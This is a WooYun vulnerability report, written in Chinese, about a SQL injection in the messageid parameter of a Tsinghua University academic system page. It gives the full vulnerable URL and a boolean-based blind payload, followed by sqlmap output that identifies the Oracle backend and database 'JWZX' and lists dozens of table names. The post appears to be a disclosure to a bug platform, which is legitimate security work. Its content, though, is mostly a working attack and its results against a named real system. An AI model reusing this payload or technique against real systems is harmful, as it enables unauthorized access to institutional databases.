WooYun.org

http://jwzx.cic.tsinghua.edu.cn/tsinghua/pub_message/message.jsp?fmodulecode=5700&modulecode=5701&messageid=10211
参数 messageid 有问题。。。
管理员亲，发之前搜了一下，不是之前的注入点，之前的已经修复了。
清华大学的教育系统,oracle 数据库
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: messageid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fmodulecode=5700&modulecode=5701&messageid=10211 AND 4490=4490
---
[14:07:43] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
current database: 'JWZX'
90个表。。tables
90
[14:06:13] [INFO] retrieved: ADMINGROUP
[14:06:49] [INFO] retrieved: ADMIN_DPT
[14:07:12] [INFO] retrieved: ADMIN_POWER
[14:08:32] [INFO] retrieved: CALENDAR
[14:09:08] [INFO] retrieved: COURSE_ADD
[14:09:56] [INFO] retrieved: DATA_INIT
[14:10:44] [INFO] retrieved: DEPARTMENT
[14:11:25] [INFO] retrieved: DIRECTION
[14:12:02] [INFO] retrieved: GROUP_POWER
[14:12:59] [INFO] retrieved: HISTORYMATRICULATION
[14:14:17] [INFO] retrieved: HISTORYMATRICULATION_LIST
[14:15:08] [INFO] retrieved: INFO_BOOK
[14:15:51] [INFO] retrieved: INFO_BOOKS_NEWREGISTER
[14:16:59] [INFO] retrieved: INFO_CLASSROOM_BUILDING
[14:18:24] [INFO] retrieved: INFO_CLASSROOM_DESKSORT
[14:19:28] [INFO] retrieved: INFO_CLASSROOM_EQUIPMENT
[14:20:24] [INFO] retrieved: INFO_CLASSROOM_RID_EID
[14:21:10] [INFO] retrieved: INFO_CLASSROOM_ROOM
[14:21:40] [INFO] retrieved: INFO_CLASSROOM_ZONE
[14:22:23] [INFO] retrieved: INFO_COUNTER
[14:23:01] [INFO] retrieved: INFO_COURSE_BOOK
[14:23:51] [INFO] retrieved: INFO_COURSE_INTRO
[14:24:47] [INFO] retrieved: INFO_COURSE_INTRO_TEMP
.......
贴出一部分来。。
权限比较低。。。
over+++